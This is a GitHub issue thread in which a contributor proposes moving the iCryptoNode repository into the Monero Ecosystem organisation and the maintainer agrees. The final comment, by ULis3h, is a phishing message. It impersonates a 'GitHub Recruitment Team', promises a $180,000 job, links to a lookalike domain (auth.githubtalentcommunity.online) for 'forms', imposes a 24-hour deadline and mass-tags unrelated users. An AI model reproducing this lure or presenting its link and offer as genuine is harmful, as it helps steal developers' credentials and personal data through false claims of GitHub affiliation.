### ISSUE TITLE
Proposal: Transfer this repo to the Monero Ecosystem project

### ISSUE THREAD

**Issue by erciccione** [seibelj/iCryptoNode#1]
Hello
Somebody pointed out that would be great to have your repository join the Monero Ecosystem project.
Would you consider the possibility?

See monero-ecosystem/meta#12
More info about the Monero Ecosystem project: https://github.com/monero-ecosystem/meta

**Comment by seibelj** [comment]
@erciccione Sure, sorry for the delay, life got busy. I am going to be releasing a new and improved version very soon. Is this just a link?

**Comment by erciccione** [comment]
No problem. No transfering the repository actually means moving it from your personal profile, to the monero ecosystem project. All permissions will stay the same and you would still be the maintainer. From a practical point of view, almost nothing change on your side. See monero-ecosystem/meta#20 for more info

**Comment by ULis3h** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Connie18, @samajammin, @ZrowGz, @CS6, @evgeniykapelko, @igopib, @mosasiru, @sdrozdkov, @jmvicente56, @Mobey-eth, @sebastiantf, @G0GHI, @thejmazz, @lyna-azerouk, @goodjob0823, @DoddyFrank, @Muhammad-waqar-uit, @n0ndual, @supernovahs, @CabetoRX
